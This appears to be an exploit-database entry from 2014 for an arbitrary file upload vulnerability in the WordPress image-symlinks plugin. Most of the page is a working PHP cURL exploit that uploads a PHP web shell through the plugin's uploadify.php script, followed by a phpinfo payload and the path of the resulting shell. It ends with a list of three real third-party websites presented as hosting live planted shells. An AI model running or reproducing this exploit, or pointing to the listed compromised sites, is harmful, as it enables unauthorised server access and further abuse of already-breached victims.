WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability
| EKU-ID: 4105 | CVE: | OSVDB-ID: |
| Author: brunox | Published: 2014-06-25 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4105 | CVE: | OSVDB-ID: |
| Author: brunox | Published: 2014-06-25 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#=> Exploit : <?php $uploadfile="Bruno.php"; $ch = curl_init("http://localhost/wordpress/wp-content/plugins/image-symlinks/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/wp-content/plugins/image-symlinks/uploadify/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://localhost/wp-content/image-symlinks/uploadify/random_name.php <?php phpinfo(); ?> ==================================== Examples : ( Live Shells ) 1 - http://www.scuboutique.com/wp-content/uploads/image-symlinks/uploadify/hun.php 2- http://datadriven.info/wp-content/uploads/image-symlinks/uploadify/hun.php 3- http://www.inlan.fr//wp-content/uploads/image-symlinks/uploadify/hun.php